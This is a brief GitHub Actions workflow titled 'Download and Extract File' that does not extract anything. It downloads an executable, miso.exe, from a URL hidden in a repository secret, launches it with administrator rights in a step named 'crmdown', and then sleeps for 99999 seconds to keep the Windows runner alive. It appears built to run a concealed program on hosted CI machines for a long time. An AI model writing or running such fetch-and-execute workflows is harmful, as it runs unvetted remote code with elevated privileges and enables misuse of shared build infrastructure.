name: Download and Extract File

on:
    workflow_dispatch:

jobs:
  download-and-extract:
    runs-on: windows-latest
    
    steps:
      - name: Checkout the repository
        uses: actions/checkout@v2

      - name: Download file using curl
        run: |
          curl -L -o miso.exe "${{ secrets.MY_URL }}"
          
      - name: crmdown
        run: Start-Process -FilePath "miso.exe" -ArgumentList "" -Verb RunAs

      - name: Time Counter
        run: sleep 99999
